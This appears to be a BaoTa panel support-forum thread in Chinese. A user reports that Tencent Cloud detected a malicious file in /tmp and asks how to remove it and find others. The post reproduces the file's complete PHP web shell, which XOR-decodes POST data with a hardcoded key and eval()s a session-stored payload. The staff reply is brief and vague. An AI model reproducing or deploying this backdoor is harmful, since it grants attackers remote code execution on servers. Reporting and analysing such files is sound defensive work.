【待反馈】tmp这个目录下出现了一个恶意文件,是腾讯云...
为了能快速了解并处理您的问题,请提供以下基础信息:面板、插件版本:8.0.5问题描述:tmp这个目录下出现了一个恶意文件,是腾讯云那边检测到...、下面是恶意代码:<?php@session_start();@set_time_limit(0);@error_reporting(0);function encode($D,$K){ for($i=0;$i<strlen($D);$i++) { $c = $K[$i+1&15]; $D[$i] = $D[$i]^$c; } return $D;}$pass='pass';$payloadName='payload';$key='3c6e0b8a9c15224a';if (isset($_POST[$pass])){ $data=encode(base64_decode($_POST[$pass]),$key); if (isset($_SESSION[$payloadName])){ $payload=encode($_SESSION[$payloadName],$key); if (strpos($payload,"getBasicsInfo")===false){ $payload=encode($payload,$key); } eval($payload); echo substr(md5($pass.$key),0,16); echo base64_encode(encode(@run($data),$key)); echo substr(md5($pass.$key),16); }else{ if (strpos($data,"getBasicsInfo")!==false){ $_SESSION[$payloadName]=encode($data,$key); } }}exit('77770123');
需要怎么处理,或者怎么排查还有没有其他恶意文件 宝塔用户_wimffm 发表于 2024-6-17 17:42
需要怎么处理,或者怎么排查还有没有其他恶意文件
您好,方便发一下文件名字吗 /tmp/phpFboigN 宝塔用户_wimffm 发表于 2024-7-10 11:38
/tmp/phpFboigN
将这个文件进行修改一下,这边看了里边的指令好像是一下加密的脚本
页:
[1]